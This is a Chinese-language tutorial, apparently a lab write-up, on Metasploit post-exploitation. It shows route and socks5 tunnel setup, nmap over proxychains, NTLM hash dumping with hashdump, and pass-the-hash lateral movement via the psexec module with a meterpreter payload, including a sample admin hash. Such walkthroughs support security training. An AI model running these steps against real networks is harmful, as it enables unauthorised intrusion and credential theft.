文中主要讲解kali中metasploit的用法,通常我们简称MSF,通过学习了解MSF的各种命令小技巧,从而掌握后渗透技术。本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。
MSF后渗透之进阶知识
获取信息
当我们获取了一个shell后,通常会遇到跨路由访问,这个时候我们就需要使用MSF来建立路由以及socks连接搭建隧道以便于我们的通信:
从这里看出是有两张网卡的:
虽然在我们的MSF中是可以对这个内网10段进行访问的,但我们在外面是并不能进行访问的:
建立路由
所以为了让外面也能同样进行访问,便于我们的渗透测试,所以需要建立路由,然后建立socks通道利用工具来进行代理访问:
run get_local_subnets #获取网卡信息
run autoroute -s 10.10.10.0/24 #添加路由10段
run autoroute -p #查看路由情况
隧道建立
建立socks5隧道:
search socks #查看socks 模块
use auxiliary/server/socks_proxy #切换到这个模块
这里的信息,VERSION SRVHOST不需要修改,SRVPORT如果修改,那么在隧道文件中也需要随之进行修改,可使用默认1080端口
修改隧道文件:
vim /etc/proxychains4.conf
使用proxychains4工具来代理:
proxychains4 nmap 10.10.10.138 -sT -Pn -A -p 445
内网横向
这样我们就可以从外面访问到10.10.10.138
当我们在跳板机上通过hashdump查到了hash,我们就可以利用psexec这个模块来进行攻击,来探测密码是否一致,如果一致,那么我们就可以扩大了内网控制权,实现内网横向:
首先获取hash:
hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:627782b7274e323941c9418399460d5b:::
然后使用模块进行攻击:
这里必须使用正向连接:
use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/bind_tcp #正向连接
set RHOST 10.10.10.138 #被攻击机地址
set SMBUser administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:627782b7274e323941c9418399460d5b
show options #查看信息
虽然我们已经建立了路由,但并没有在msf中设置全局代理,所以是无法攻击成功的。
setg Proxies socks5:192.168.1.6:1080 #设置全局代理
set ReverseAllowProxy true #这个参数是因为使用全局代理,可能会导致我们的shell无法反弹,所以需要开启。
成功反弹:
当如果有多网段,那么我们也同样可以通过添加路由的方式,来进行访问。